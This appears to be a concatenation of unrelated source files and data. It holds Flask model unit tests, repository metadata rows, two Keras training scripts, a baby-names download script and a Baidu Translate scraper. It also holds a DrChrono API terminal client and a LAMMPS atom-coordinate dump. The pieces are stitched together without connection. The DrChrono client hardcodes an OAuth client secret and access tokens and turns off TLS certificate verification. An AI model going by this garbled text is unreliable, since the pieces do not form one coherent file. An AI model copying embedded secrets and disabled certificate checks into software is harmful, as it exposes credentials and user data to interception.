expires_in=self.app.config['OAUTH2_PROVIDER_TOKEN_EXPIRES_IN'],
refresh_token=fixtures.UUID, scope=' '.join(models.EUCABY_SCOPES),
token_type=fixtures.TOKEN_TYPE)
token = models.Token.create_eucaby_token(self.user.id, token_dict)
test_utils.assert_object(
token, user_id=self.user.id, service=models.EUCABY,
access_token=fixtures.UUID, refresh_token=fixtures.UUID)
self.assertEqual(1, models.Token.query.count())
token_dict['access_token'] = fixtures.UUID2
# Refresh token exists
token.update_token(token_dict)
token_obj = models.Token.query.first() # Query form database
test_utils.assert_object(
token_obj, user_id=self.user.id, service=models.EUCABY,
access_token=fixtures.UUID2, refresh_token=fixtures.UUID)
def test_get_by(self):
"""Tests token get by parameters."""
# Unknown service
self.assertRaises(AssertionError, models.Token.get_by, 'Unknown')
# Populate Eucaby and FB tokens
for i in range(2):
params = dict(access_token='{}'.format(i), expires_in=5, scope='',
refresh_token='{}'.format(i))
models.Token.create_eucaby_token(self.user.id, params)
params = dict(user_id=self.user.id, access_token='{}'.format(i+10),
expires_seconds=5)
models.Token.create_facebook_token(**params)
# Check Eucaby token
token = models.Token.get_by(models.EUCABY)
self.assertEqual(models.EUCABY, token.service)
self.assertEqual('1', token.access_token)
# Check FB token
token = models.Token.get_by(models.FACEBOOK)
self.assertEqual(models.FACEBOOK, token.service)
self.assertEqual('11', token.access_token)
class TestUserSettings(test_base.TestCase):
"""Tests UserSettings model."""
def setUp(self):
super(TestUserSettings, self).setUp()
self.testbed = test_utils.create_testbed()
self.user = models.User.create(
username='2345', first_name='Test', last_name=u'Юзер',
email='[email protected]')
def tearDown(self):
super(TestUserSettings, self).tearDown()
self.testbed.deactivate()
def test_user_settings(self):
"""Tests that user settings are created when user is created."""
objs = models.UserSettings.query.all()
self.assertEqual(1, len(objs))
# Initial settings
self.assertEqual(flask.json.dumps(models.UserSettings.DEFAULT_SETTINGS),
objs[0].settings)
def test_get_or_create(self):
"""Tests get or create user settings."""
models.UserSettings.query.delete() # Clear user settings first
# User exists
models.UserSettings.get_or_create(self.user.id, commit=False)
objs = models.UserSettings.query.all()
# With commit set to False no object is created
self.assertEqual([], objs)
# User doesn't exist
self.assertRaises(orm_exc.NoResultFound,
models.UserSettings.get_or_create, (123), commit=True)
models.db.session.rollback() # Rollback session
# Successful user settings creation (operation is idempotent)
for i in range(2): # pylint: disable=unused-variable
obj = models.UserSettings.get_or_create(self.user.id, commit=True)
objs = models.UserSettings.query.all()
default_settings = flask.json.dumps(
models.UserSettings.DEFAULT_SETTINGS)
self.assertEqual([obj], objs)
self.assertEqual(default_settings, obj.settings)
self.assertEqual(
models.UserSettings.DEFAULT_SETTINGS, obj.to_dict())
def test_update(self):
"""Tests settings update."""
obj = models.UserSettings.get_or_create(self.user.id)
obj.update({}, commit=True) # Empty settings first
# Test A: Set settings
obj.update(dict(hello='world'))
self.assertEqual('{"hello": "world"}', obj.settings)
# Settings is committed
obj2 = models.UserSettings.query.first()
self.assertEqual('{"hello": "world"}', obj2.settings)
# Test B: Update settings param
obj = models.UserSettings.get_or_create(self.user.id)
obj.update(dict(hello='you'))
self.assertEqual('{"hello": "you"}', obj.settings)
# Test C: Add a new param
obj = models.UserSettings.get_or_create(self.user.id)
obj.update(dict(test='me'))
self.assertEqual('{"hello": "you", "test": "me"}', obj.settings)
# Test D: Update settings to default values
obj = models.UserSettings.get_or_create(self.user.id)
obj.update(None)
obj2 = models.UserSettings.query.first()
self.assertEqual(flask.json.dumps(models.UserSettings.DEFAULT_SETTINGS),
obj2.settings)
@unittest.skip('Skip restricting setting the settings field')
def test_set_settings(self):
"""Tests set settings."""
obj = models.UserSettings.get_or_create(self.user.id)
# Empty string is not a valid json format: obj.settings = ''
self.assertRaises(ValueError, setattr, obj, 'settings', '')
obj.settings = '{"hello": "world"}' # Valid json format
obj.settings = None # None is allowed
obj.setting = '[]' # Empty list if also allowed
def test_param(self):
"""Tests param method."""
obj = models.UserSettings.get_or_create(self.user.id, commit=True)
self.assertEqual(None, obj.param('hello')) # No parameter set
obj.update({'hello': 'world'}, commit=True) # Set parameter
obj2 = models.UserSettings.query.first()
self.assertEqual('world', obj2.param('hello'))
# Clear parameters
obj = models.UserSettings.get_or_create(self.user.id)
obj.update(None)
obj2 = models.UserSettings.query.first()
self.assertEqual(None, obj2.param('hello'))
def test_user_param(self):
"""Tests user settings param."""
cache_key = 'user_id::{}::settings'.format(self.user.id)
get_or_create = 'eucaby_api.models.UserSettings.get_or_create'
# When UserSettings object is created settings cache is not set
self.assertIsNone(memcache.get(cache_key))
# If cache is not set calling user_param will also call get_or_create
with mock.patch(get_or_create) as gc_mock:
gc_mock.return_value = mock.Mock(settings='{}')
models.UserSettings.user_param(self.user.id, 'hello')
self.assertTrue(gc_mock.called)
memcache.flush_all()
# Wrong user id
with self.assertRaises(orm_exc.NoResultFound):
models.UserSettings.user_param('wrong', 'hello')
# Non-existing key
value = models.UserSettings.user_param(self.user.id, 'hello')
self.assertIsNone(value)
self.assertEqual( # user_param sets the cache
'{"email_subscription": true}', memcache.get(cache_key))
# If settings cache is set it shouldn't call get_or_create
with mock.patch(get_or_create) as gc_mock:
models.UserSettings.user_param(self.user.id, 'hello')
self.assertFalse(gc_mock.called)
# Updating settings should refresh the cache
obj = models.UserSettings.get_or_create(self.user.id)
obj.update(dict(hello='world'))
text = '{"email_subscription": true, "hello": "world"}'
self.assertEqual(text, memcache.get(cache_key))
value = models.UserSettings.user_param(self.user.id, 'hello')
self.assertEqual('world', value)
class TestDevice(test_base.TestCase):
"""Tests Device model."""
def setUp(self):
super(TestDevice, self).setUp()
self.user = models.User.create(
username='2345', first_name='Test', last_name=u'Юзер',
email='[email protected]')
self.user2 = models.User.create(
username='1234', first_name='Test2', last_name=u'Юзер2',
email='[email protected]')
def test_create(self):
"""Create device is indempotent."""
for i in range(2): # pylint: disable=unused-variable
obj = models.Device.get_or_create(
self.user, 'somedevicekey', 'android')
objs = models.Device.query.all()
self.assertEqual(1, len(objs))
self.assertEqual(objs[0], obj)
test_utils.assert_object(
obj, device_key='somedevicekey', platform='android')
self.assertEqual(1, len(obj.users))
def test_many_users(self):
"""Two and more users can be associated with the same device."""
obj = models.Device.get_or_create(self.user, 'somedevicekey', 'android')
obj2 = models.Device.get_or_create(
self.user2, 'somedevicekey', 'android')
objs = models.Device.query.all()
self.assertEqual(1, len(objs))
self.assertEqual(obj, obj2)
# Should have two users
self.assertEqual([self.user, self.user2], obj.users)
def test_get_by_user(self):
"""List of devices by user."""
obj1 = models.Device.get_or_create(
self.user, 'somedevicekey', 'android')
obj2 = models.Device.get_or_create(
self.user, 'olddevicekey', 'ios')
models.Device.get_or_create(
self.user2, 'newdevicekey', 'android')
objs = models.Device.get_by_username(self.user.username)
self.assertEqual([obj1, obj2], objs)
# Filter by platform
objs = models.Device.get_by_username(
self.user.username, platform='android')
self.assertEqual([obj1], objs)
# Deactivate one device
obj2.deactivate()
self.assertFalse(obj2.active)
self.assertEqual(
[obj1], models.Device.get_by_username(self.user.username))
def test_deactivate_multiple(self):
"""Tests deactivate multiple devices."""
# Create devices
device_params = [
('12', api_args.ANDROID), ('23', api_args.IOS),
('34', api_args.IOS), ('45', api_args.ANDROID)]
devices = [models.Device.get_or_create(
self.user, *param) for param in device_params]
devices[0].deactivate()
def _verify_devices(username, device_objs):
objs = models.Device.get_by_username(username)
self.assertEqual(device_objs, objs)
# No device keys or no devices for the device keys
cases = [[], ['11', '22']]
for device_keys in cases:
models.Device.deactivate_multiple(device_keys)
_verify_devices(self.user.username, devices[1:])
# Existing devices
models.Device.deactivate_multiple(['23', '34'])
_verify_devices(self.user.username, devices[3:])
# Deactivate by platform
# Has no iOS device with the device_key
models.Device.deactivate_multiple(['45',], platform=api_args.IOS)
_verify_devices(self.user.username, devices[3:])
# Has Android device with the device_key
models.Device.deactivate_multiple(['45',], platform=api_args.ANDROID)
_verify_devices(self.user.username, [])
class TestEmailHistory(test_base.TestCase):
"""Tests EmailHistory model."""
def setUp(self):
super(TestEmailHistory, self).setUp()
self.user = models.User.create(
username='2345', first_name='Test', last_name=u'Юзер',
email='[email protected]')
self.user2 = models.User.create(
username='1234', first_name='Test2', last_name=u'Юзер2',
email='[email protected]')
def test_get_or_create(self):
"""Tests get or create email history."""
cases = ['hello', 'Hello']
for text in cases:
obj = models.EmailHistory.get_or_create(self.user.id, text)
self.assertEqual('hello', obj.text)
self.assertEqual(1, models.EmailHistory.query.count())
def test_get_by_user(self):
"""Tests filtering by user."""
# Populate email history
cases = (
(self.user, ['Alaska', 'Arkansas', 'arizona', 'ARIZONA', 'colorado',
'Connecticut', 'California']),
(self.user2, ['alabama', ]))
for user, text_list in cases:
for text in text_list:
models.EmailHistory.get_or_create(user.id, text=text)
all_list = ['alaska', 'arizona', 'arkansas', 'california', 'colorado',
'connecticut']
cases = (
(dict(user_id=None), []), # Unknow user
(dict(user_id=self.user.id), all_list), # Get by user
# Empty query
(dict(user_id=self.user.id, query=''), []),
# Query with empty result
(dict(user_id=self.user.id, query='d'), []),
# Query with result, no limit
(dict(user_id=self.user.id, query='ar'), ['arizona', 'arkansas']),
# Query with limit
(dict(user_id=self.user.id, query='a', limit=2),
['alaska', 'arizona']),
# Query with large limit
(dict(user_id=self.user.id, query='a', limit=100),
['alaska', 'arizona', 'arkansas']))
for kwargs, email_list in cases:
objs = models.EmailHistory.get_by_user(**kwargs)
self.assertEqual(email_list, [obj.text for obj in objs])
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
706ea96b1d69e63a0c8a768ea8843ab3bd9e5428 | 8d1309e560216fb84aee6b5fac4f7d8fac07f5d6 | /jiangyuan/图像分类/keras/图像分类sequential.py | 74c8f7d99dfab48c1d04a4f3040b771f1569b333 | [] | no_license | NWU-SMART/2019TEAMNEW-TrainCodes | 2dfb4d160d6419d96538f033b1332c2cb171e3e0 | 91a6c8b9395fff72079f21c4a26401179f3ad8a6 | refs/heads/master | 2022-12-23T22:03:39.030888 | 2020-10-05T07:06:00 | 2020-10-05T07:06:00 | 270,465,529 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,847 | py | # ----------------开发者信息--------------------------------#
# 开发者:姜媛
# 开发日期:2020年6月2日
# 修改日期:
# 修改人:
# 修改内容:
# ----------------开发者信息--------------------------------#
# ---------------------- 代码布局: ----------------------
# 1、导入 Keras, matplotlib, numpy, sklearn 和 panda的包
# 2、招聘数据数据导入
# 3、分词和提取关键词
# 4、建立字典,并使用
# 5、训练模型
# 6、保存模型,显示运行结果
# ---------------------- 代码布局: ----------------------
# -------------------------- 1、导入需要包 -------------------------------
from tensorflow.python.keras.utils import get_file
import gzip
import numpy as np
import keras
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.layers import Conv2D, MaxPooling2D
import os
import functools
import matplotlib.pyplot as plt
# -------------------------- 1、导入需要包 -------------------------------
# -------------------------- 2、读取数据与数据预处理 -------------------------------
# 数据集和代码放一起即可
def load_data():
paths = [
'C:\\Users\\HP\\Desktop\\每周代码学习\\图像分类\\train-labels-idx1-ubyte.gz',
'C:\\Users\\HP\\Desktop\\每周代码学习\\图像分类\\train-images-idx3-ubyte.gz',
'C:\\Users\\HP\\Desktop\\每周代码学习\\图像分类\\t10k-labels-idx1-ubyte.gz',
'C:\\Users\\HP\\Desktop\\每周代码学习\\图像分类\\t10k-images-idx3-ubyte.gz'
]
with gzip.open(paths[0], 'rb') as lbpath:
y_train = np.frombuffer(lbpath.read(), np.uint8, offset=8)
with gzip.open(paths[1], 'rb') as imgpath:
x_train = np.frombuffer(
imgpath.read(), np.uint8, offset=16).reshape(len(y_train), 28, 28, 1)
with gzip.open(paths[2], 'rb') as lbpath:
y_test = np.frombuffer(lbpath.read(), np.uint8, offset=8)
with gzip.open(paths[3], 'rb') as imgpath:
x_test = np.frombuffer(
imgpath.read(), np.uint8, offset=16).reshape(len(y_test), 28, 28, 1)
return (x_train, y_train), (x_test, y_test)
(x_train, y_train), (x_test, y_test) = load_data()
batch_size = 32
num_classes = 10
epochs = 5
data_augmentation = True # 图像增强
num_predictions = 20
save_dir = os.path.join(os.getcwd(), 'saved_models_cnn')
model_name = 'keras_fashion_trained_model.h5'
# Convert class vectors to binary class matrices. 类别独热编码
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train /= 255 # 归一化
x_test /= 255 # 归一化
# -------------------------- 2、读取数据与数据预处理 -------------------------------
# -------------------------- 3、Sequential模型 -------------------------------
model = Sequential()
model.add(Conv2D(32, (3, 3), padding='same', # 32,(3,3)是卷积核数量和大小
input_shape=x_train.shape[1:])) # 第一层需要指出图像的大小
model.add(Activation('relu'))
model.add(Conv2D(32, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Conv2D(64, (3, 3), padding='same'))
model.add(Activation('relu'))
model.add(Conv2D(64, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(512))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes))
model.add(Activation('softmax'))
# initiate RMSprop optimizer
opt = keras.optimizers.rmsprop(lr=0.0001, decay=1e-6)
# Let's train the model using RMSprop
model.compile(loss='categorical_crossentropy',
optimizer=opt,
metrics=['accuracy'])
# -------------------------- 3、Sequential模型 -------------------------------
# -------------------------- 4、数据增强、模型训练 -------------------------------
if not data_augmentation:
print('Not using data augmentation.')
history = model.fit(x_train, y_train,
batch_size=batch_size,
epochs=epochs,
validation_data=(x_test, y_test),
shuffle=True)
else:
print('Using real-time data augmentation.')
datagen = ImageDataGenerator(
featurewise_center=False,
samplewise_center=False,
featurewise_std_normalization=False,
samplewise_std_normalization=False,
zca_whitening=False,
zca_epsilon=1e-06,
rotation_range=0,
width_shift_range=0.1,
height_shift_range=0.1,
shear_range=0.,
zoom_range=0.,
channel_shift_range=0.,
fill_mode='nearest',
cval=0.,
horizontal_flip=True,
vertical_flip=False,
rescale=None,
preprocessing_function=None,
data_format=None,
validation_split=0.0)
datagen.fit(x_train)
print(x_train.shape[0]//batch_size) # 取整
print(x_train.shape[0]/batch_size) # 保留小数
history = model.fit_generator(datagen.flow(x_train, y_train, batch_size=batch_size),
epochs=epochs,
steps_per_epoch=x_train.shape[0]//batch_size,
validation_data=(x_test, y_test),
workers=10
)
# -------------------------- 4、数据增强、模型训练 -------------------------------
# -------------------------- 5、保存模型 -------------------------------
model.summary()
# Save model and weights
if not os.path.isdir(save_dir):
os.makedirs(save_dir)
model_path = os.path.join(save_dir, model_name)
model.save(model_path)
print('Saved trained model at %s ' % model_path)
# -------------------------- 5、保存模型 -------------------------------
# -------------------------- 6、显示运行结果 -------------------------------
# 绘制训练 & 验证的准确率值
plt.plot(history.history['acc'])
plt.plot(history.history['val_acc'])
plt.title('Model accuracy')
plt.ylabel('Accuracy')
plt.xlabel('Epoch')
plt.legend(['Train', 'Valid'], loc='upper left')
plt.savefig('tradition_cnn_valid_acc.png')
plt.show()
# 绘制训练 & 验证的损失值
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('Model loss')
plt.ylabel('Loss')
plt.xlabel('Epoch')
plt.legend(['Train', 'Valid'], loc='upper left')
plt.savefig('tradition_cnn_valid_loss.png')
plt.show()
# -------------------------- 6、保存模型,显示运行结果 -------------------------------
| [
"[email protected]"
] | |
6c8cece88b3055b1d1d13c390ef8bd89c64cf8cf | 84d2ff947263d3007c0591a4243fd00169e0c8e0 | /Course_Material/Machine Learning A-Z Template Folder/Part 8 - Deep Learning/Section 39 - Artificial Neural Networks (ANN)/ann.py | 311eb24ffac8ac9c40d063baf701d8a2d0dc39fa | [] | no_license | ZackMinott/Machine-Learning-Course | 8480e68daa8d271823d386bd5b95b14fdcc6d291 | 4908a461e48997a0dee1ea18fe4c86bf9997e4af | refs/heads/master | 2020-06-28T19:54:28.293282 | 2020-02-04T00:28:36 | 2020-02-04T00:28:36 | 200,324,972 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,559 | py | # Artificial Neural Network
#Installing Theano
# pip install --upgrade --no-deps git+git://github.com/Theano/Theano.git
#Installing TensorFlow
# Install Tensorflow from the website: https://www.tensorflow.org/versions/r0.11/get_started
# Installing Keras
# pip install --upgrade keras
# TensorFlow and Theano now come with Keras
# Part 1 - Data Preprocessing
# Importing the Libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the Dataset
dataset = pd.read_csv('Churn_Modelling.csv')
X = dataset.iloc[:, 3:13].values # Independent Variables
y = dataset.iloc[:, 13].values
# Encoding Categorical Data
from sklearn.preprocessing import OneHotEncoder
from sklearn.compose import ColumnTransformer
ct = ColumnTransformer([('encoder', OneHotEncoder(), [1,2])], remainder = 'passthrough')
X = np.array(ct.fit_transform(X), dtype = np.float)
#Encoding the Dependent Variables
from sklearn.preprocessing import LabelEncoder
y = LabelEncoder().fit_transform(y)
X = X[:, 1:]
#Splitting the dataset into the Training Set and Test Set
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)
from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
X_train = sc_X.fit_transform(X_train)
X_test = sc_X.transform(X_test)
# Part 2 - Now let's make the ANN!
# Importing the Keras libraries and packages
import keras
from keras.models import Sequential # Used to initialize neural network
from keras.layers import Dense # import layers for neural network
# Initialising the ANN
classifier = Sequential()
# Adding the input layer and the first hidden layer
classifier.add(Dense(units = 6, kernel_initializer = 'uniform', activation = 'relu', input_dim = 12))
# Add the second hidden layer
classifier.add(Dense(units = 6, kernel_initializer = 'uniform', activation = 'relu'))
# Adding the output layer
classifier.add(Dense(units = 1, kernel_initializer = 'uniform', activation = 'sigmoid'))
# Compiling the ANN
classifier.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])
# Fitting the ANN to the Training Set
classifier.fit(X_train, y_train, batch_size = 10, nb_epoch = 100)
# Part 3 -- Making the predictions and evaluating the model
# Predicting the Test set results
y_pred = classifier.predict(X_test)
y_pred = (y_pred > 0.5) # returns true if greater than 0.5
# Making the Confusion Matrix
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(y_test, y_pred) | [
"[email protected]"
] | |
5476d32819913f1e2e7c00acefab8291cbb72934 | 69636805a67ed244e13d61d838b56791018dee62 | /exercises/0013-sorted-names/a.py | a7fab637a9477ecdb1851e2b96ca69d16d3a6c27 | [] | no_license | anacrochas1/compciv-2016 | 2176306d774642f7d9a22f02c9d6a599a9942a18 | abd94d0bfcc6c1612ada06f3f563c0764b2fe2b9 | refs/heads/master | 2021-01-18T21:09:33.755755 | 2016-06-02T05:54:18 | 2016-06-02T05:54:18 | 49,533,363 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 625 | py | import requests
import os
if not os.path.exists("tempdata"):
os.makedirs("tempdata")
if not os.path.exists("0013-sorted-names/tempdata"):
os.makedirs("0013-sorted-names/tempdata")
burl = 'http://stash.compciv.org/ssa_baby_names/ssa-babynames-nationwide-2014.txt'
resp = requests.get(burl)
bname = "tempdata/ssa-babynames-nationwide-2014.txt"
bfile = open(bname, 'wb')
bfile.write(resp.content)
bfile.close()
# # number of caracters
bname = os.path.join('tempdata', 'ssa-babynames-nationwide-2014.txt')
blink = open(bname, 'r')
count_letters = len(resp.text)
print("There are", count_letters, "characters in", bname)
| [
"[email protected]"
] | |
94701c45eae3bf2704f4487b4dc17c05e69b14a1 | 54f2d0d51d7e422e04572da271b83cf35d7c597c | /Reptile/Demo01/实战案例/Demo02破解百度翻译/破解百度翻译.py | 2a1a734ac5d703a64cb1ed078dd4bff8b4f4fcd9 | [] | no_license | wangzilong2019/PythonReptile | 875a3b45369d129b28caf8aa1c286d2dea769f7f | e8d8acc98ebe09997a8f469c8901e7ca9d0411b5 | refs/heads/main | 2023-02-11T23:11:05.991416 | 2021-01-05T15:35:06 | 2021-01-05T15:35:06 | 326,437,983 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,037 | py | import requests
import json
if __name__ == "__main__":
# 1、指定URL,注意这里url不是从页面直接获取,而是从抓包里获取的
post_url = 'https://fanyi.baidu.com/sug'
#2、进行 UA伪装
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'
}
#3、 post请求参数处理(同get一样)
word = input('enter a word:')
data = {
'kw':word
}
# 4、发起请求
response = requests.post(url=post_url, data=data, headers=headers)
# 5、获取响应数据(这里注意响应数据是json格式,json()返回的是obj,如果确认响应数据时json类型的才可以用 )
dic_obj = response.json()
# 6、持久化存储
fileName = word + '.json'
fp = open(fileName, 'w', encoding='utf-8')
# 因为拿到json字符串中有中文,中文不能使用ACSII编码
json.dump(dic_obj, fp=fp, ensure_ascii=False)
print('over!!!')
| [
"[email protected]"
] | |
bf54f402c2a55b37664570d4572f8e6fb5371525 | 0309260a78facd92b832158c75dd9bd904ea650d | /drchrono-terminal.py | b629bb171247b64990e308de6f18a775c127cf98 | [] | no_license | YiqinZhang/DrChrono | 3bcd08335979ec7eacedeba4ca34e1396669f2a1 | 26d1c7a19169c4f75d24bbb5b8f4e62414cb5126 | refs/heads/main | 2023-02-22T00:49:01.010733 | 2021-01-18T21:21:42 | 2021-01-18T21:21:42 | 330,784,056 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,003 | py | import requests, json, datetime, pytz, subprocess, sys, urllib3
urllib3.disable_warnings()
def main_app(access_token, refresh_token):
doc_url = 'https://app.drchrono.com/api/doctors'
json_res = make_request(doc_url, access_token)
doc_id = json_res['results'][0]['id']
doc_firstname = json_res['results'][0]['first_name']
doc_lastname = json_res['results'][0]['last_name']
while 1:
print('---------------\nHello, Dr. ' + doc_lastname + '!\n')
print('1. Print all patients (lengthy!)\n2. Print doctor information\n3. Search for a patient\n\n0. Exit\n\n')
option = input('DrDash Terminal > ')
if option=='0':
break
elif option=='1':
test_api_url = 'https://app.drchrono.com/api/patients'
json_res = make_request(test_api_url, access_token)
for i in range(len(json_res['results'])):
for key, value in json_res['results'][i].items():
print(key, ":", value)
elif option=='2':
test_api_url = 'https://app.drchrono.com/api/doctors'
json_res = make_request(test_api_url, access_token)
for i in range(len(json_res['results'])):
print('\n')
for key, value in json_res['results'][i].items():
print(key, ":", value)
elif option=='3':
tekr = 0
searchres = []
searchstring = input("Enter the search string: ")
test_api_url = 'https://app.drchrono.com/api/patients'
json_res = make_request(test_api_url, access_token)
for i in range(len(json_res['results'])):
for key, value in json_res['results'][i].items():
if key=='first_name' or key=='last_name':
newval = value.lower()
if searchstring.lower()==newval.lower():
searchres.insert(tekr, json_res['results'][i]['first_name'] + " " + json_res['results'][i]['last_name'])
tekr = tekr + 1
length = len(searchres)
if length < 1:
print("No results")
else:
print("Found " + str(length) + " result(s)")
for i in range(length):
print(searchres[i])
else:
print('unrecognized command')
# print(api_call_response.text)
def make_request(url, access_token):
api_call_headers = {'Authorization': 'Bearer ' + access_token}
api_call_response = requests.get(url, headers=api_call_headers, verify=False)
api_json = api_call_response.json()
return api_json
print("DrDash 1.01")
print("----------")
answer = input("Are you logged in? (yes/debug/exit): ")
if answer=='yes':
access_token = input('access_token: ')
refresh_token = input('refresh token: ')
main_app(access_token, refresh_token)
elif answer=='no':
code = input('code: ')
response = requests.post('https://drchrono.com/o/token/', data={
'code': code,
'grant_type': 'authorization_code',
'redirect_uri': 'https://drdash.herokuapp.com/',
'client_id': 'gCVCP45fvAZqwlQvB6d4CUqEFlonrXTCjbr90BLm',
'client_secret': 'ZvfvYGFNkabOPiLhQYlxacUWS8c1mA6Sc8Ec0XEaPhaYBCXMy1l89qyXDqMA8XbAQCHmnfuEf6BchB9WGBaeTTkpRe4B7Y9HlJVbAIR1NLVmkpwXQ3b0Vh3ax1LIQM3R',
})
response.raise_for_status()
data = response.json()
# Save these in your database associated with the user
access_token = data['access_token']
refresh_token = data['refresh_token']
expires_timestamp = datetime.datetime.now(pytz.utc) + datetime.timedelta(seconds=data['expires_in'])
elif answer=='debug':
main_app('CCdp8mvLYMWNaVWRodrgx95BtaAkt6', 'ETQUgVbs6SmYWu6p2u82y9nF0vw3hX')
elif answer=='exit':
print('exiting...')
else:
print(answer + ' : command not recognized')
| [
"[email protected]"
] | |
1b71e36135253692cdf852abf5a83de796cd8cc8 | 649bd422025e421d86025743eac324c9b882a2e8 | /exam/1_three-dimensional_atomic_system/dump/phasetrans/temp69_9500.py | 5d980c46f0efa2cef312dec32e7fecc008b51e79 | [] | no_license | scheuclu/atom_class | 36ddee1f6a5995872e858add151c5942c109847c | 0c9a8c63d9b38898c1869fe8983126cef17662cd | refs/heads/master | 2021-01-21T10:52:28.448221 | 2017-03-07T23:04:41 | 2017-03-07T23:04:41 | 83,489,471 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 68,936 | py | ITEM: TIMESTEP
9500
ITEM: NUMBER OF ATOMS
2048
ITEM: BOX BOUNDS pp pp pp
5.1115624967957274e-01 4.6688843750315684e+01
5.1115624967957274e-01 4.6688843750315684e+01
5.1115624967957274e-01 4.6688843750315684e+01
ITEM: ATOMS id type xs ys zs
8 1 0.122891 0.0692552 0.0594138
35 1 0.0660705 0.12858 0.0643852
130 1 0.0658427 0.0673858 0.123046
165 1 0.125365 0.130345 0.130941
133 1 0.125545 0.00121744 0.128155
3 1 0.0632227 0.00654306 0.0643839
12 1 0.243812 0.0602803 0.0636837
39 1 0.186959 0.121558 0.0629399
43 1 0.311473 0.121968 0.0644408
134 1 0.182138 0.0649791 0.127788
138 1 0.310192 0.0608961 0.1163
169 1 0.244189 0.129378 0.126825
11 1 0.307325 0.997075 0.0609899
7 1 0.179738 0.0100173 0.0673374
1058 1 0.0611889 0.690854 0.00419769
16 1 0.377334 0.0668562 0.0670176
47 1 0.440218 0.123565 0.0591307
142 1 0.436804 0.0586052 0.123478
173 1 0.376802 0.125347 0.124431
15 1 0.442098 0.994353 0.0590983
561 1 0.500103 0.125908 0.500951
1037 1 0.369477 0.497087 0.00272885
46 1 0.438795 0.18282 0.00223036
40 1 0.118129 0.188076 0.0620903
67 1 0.0608542 0.244861 0.0591712
72 1 0.124655 0.311307 0.0516718
162 1 0.0616593 0.185579 0.12356
194 1 0.0724284 0.313293 0.118095
197 1 0.119742 0.249505 0.12582
1026 1 0.0644562 0.559449 0.00130125
13 1 0.374721 0.997235 0.011579
292 1 0.000318054 0.187638 0.312222
180 1 0.496566 0.181695 0.187547
44 1 0.247148 0.189428 0.0584788
71 1 0.183709 0.255219 0.0593705
75 1 0.311256 0.25076 0.068968
76 1 0.24893 0.315336 0.0660112
166 1 0.18442 0.190042 0.123311
170 1 0.316233 0.18439 0.1256
198 1 0.182118 0.308357 0.116634
201 1 0.251013 0.251657 0.123763
202 1 0.306313 0.317439 0.123227
1642 1 0.311605 0.937561 0.497998
225 1 0.00284089 0.37001 0.126252
48 1 0.37271 0.179881 0.0565739
79 1 0.444606 0.247488 0.0705538
80 1 0.370877 0.307496 0.0700967
174 1 0.439368 0.181746 0.118777
205 1 0.375402 0.242129 0.124437
206 1 0.435013 0.3167 0.127336
41 1 0.25075 0.125873 0.00450461
1094 1 0.18647 0.812715 0.000628729
1133 1 0.367976 0.881306 0.0117022
1030 1 0.180427 0.563176 0.0034469
1519 1 0.435042 0.865798 0.438758
99 1 0.0588737 0.382945 0.0582983
104 1 0.130679 0.438966 0.0596712
226 1 0.0602509 0.439643 0.124907
229 1 0.12344 0.373014 0.113081
1027 1 0.0601871 0.495281 0.0558824
1157 1 0.119064 0.502025 0.126956
36 1 0.00176503 0.18938 0.060605
1057 1 0.00400782 0.629594 0.00770463
1517 1 0.379917 0.878134 0.369952
103 1 0.185014 0.377962 0.0534014
107 1 0.309025 0.37151 0.0579238
108 1 0.250912 0.440798 0.0599089
230 1 0.185484 0.442755 0.11462
233 1 0.250705 0.377531 0.123561
234 1 0.311321 0.440869 0.125894
1377 1 0.00373547 0.88021 0.245895
1038 1 0.432289 0.568535 0.00412378
111 1 0.432995 0.377075 0.0634072
112 1 0.368265 0.438859 0.0674193
237 1 0.36443 0.376133 0.126201
238 1 0.435957 0.436005 0.122848
1518 1 0.445988 0.930152 0.368946
1380 1 0.00448556 0.938782 0.307346
1130 1 0.306294 0.936537 0.0074403
1508 1 0.00444635 0.938635 0.430168
1409 1 0.000965949 0.505048 0.377525
1032 1 0.121464 0.558078 0.0686545
1059 1 0.0647454 0.626865 0.0632443
1154 1 0.0570682 0.564228 0.12363
1189 1 0.113029 0.624263 0.134233
353 1 -0.00101609 0.381731 0.248108
1034 1 0.310661 0.563398 0.00224086
1345 1 0.00310938 0.752781 0.260545
1161 1 0.246789 0.501402 0.123703
1035 1 0.31172 0.50192 0.0638399
1031 1 0.188416 0.503345 0.0580211
1036 1 0.253342 0.56366 0.0628048
1063 1 0.17913 0.618739 0.0644495
1067 1 0.306665 0.627804 0.0609208
1158 1 0.188598 0.560545 0.123597
1162 1 0.31073 0.5572 0.124739
1193 1 0.24668 0.628426 0.1261
109 1 0.372917 0.370485 0.00131538
449 1 0.0070164 0.250028 0.374769
1165 1 0.380461 0.507908 0.127661
1039 1 0.434407 0.486688 0.0619436
1040 1 0.371237 0.564827 0.0629547
1071 1 0.439733 0.630067 0.0594213
1166 1 0.438101 0.558009 0.119171
1197 1 0.372486 0.620397 0.118592
77 1 0.372243 0.250588 0.00538345
